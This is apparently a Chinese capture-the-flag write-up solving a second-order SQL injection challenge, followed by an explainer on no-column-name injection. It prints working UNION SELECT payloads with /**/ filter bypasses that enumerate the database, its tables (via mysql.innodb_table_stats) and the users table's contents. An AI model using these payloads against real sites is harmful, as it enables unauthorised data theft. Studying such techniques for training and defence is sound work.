进入题目页面如下

猜测是二次注入

先注册一个账号

再登录，页面如下

点击申请发布广告

页面如上，存在注入点，尝试

判读是整数型注入还是字符型注入

猜解字段数，尝试发现or,#,空格等被过滤了，只能一个一个试

使用联合查询试试

-1'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

居然有22个

测试后注入点在2处

爆出数据库名

1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

数据库名为web1

爆出表名

1'/**/union/**/select/**/1,database(),group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name="web1"'

表名是abs和users

爆出字段内容

1'/**/union/**/select/**/1,database(),(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

终于得到了flag

---

无字段名注入

基本概念

在常规的 SQL 注入中，通常需要明确知道数据库表的字段名，然后通过构造恶意输入来干扰 SQL 语句的正常执行。而无字段名注入则是在不知道具体字段名的情况下，仍然能够实施注入攻击，获取数据库中的信息

产生原因

动态 SQL 语句构建：当开发人员在编写代码时，采用动态拼接 SQL 语句的方式，且对用户输入的验证和过滤不严格，就可能为无字段名注入提供机会。

通用查询接口：一些应用程序提供了通用的查询接口，允许用户输入条件进行数据查询，但没有对输入进行有效的限制，可以利用这个接口进行无字段名注入。

攻击原理

无字段名注入主要利用 SQL 语句的一些特性，如 ORDER BY 子句、GROUP BY 子句、LIMIT 子句等，结合盲注技术来逐步获取数据库信息。以下是几种常见的无字段名注入方法：

利用 ORDER BY 子句确定字段数量

SELECT * FROM users WHERE id = 1 ORDER BY 1 -- 正常返回
SELECT * FROM users WHERE id = 1 ORDER BY 2 -- 正常返回
SELECT * FROM users WHERE id = 1 ORDER BY 3 -- 报错

通过不断尝试不同的数字作为 ORDER BY 子句的参数，当返回报错时，说明表中的字段数量小于该数字，从而确定表中的字段数量。

利用 GROUP BY 子句和聚合函数获取数据

在确定了字段数量后，可以利用 GROUP BY 子句和聚合函数（如 COUNT、SUM 等）来获取数据。例

SELECT COUNT(*), GROUP_CONCAT(column1, column2) FROM users GROUP BY id;

可以通过不断尝试不同的组合，结合盲注技术，逐步获取字段中的数据。

利用 LIMIT 子句逐行获取数据

在获取了表的字段数量后，可以使用 LIMIT 子句逐行获取数据。

SELECT * FROM users LIMIT 0, 1; -- 获取第一行数据
SELECT * FROM users LIMIT 1, 1; -- 获取第二行数据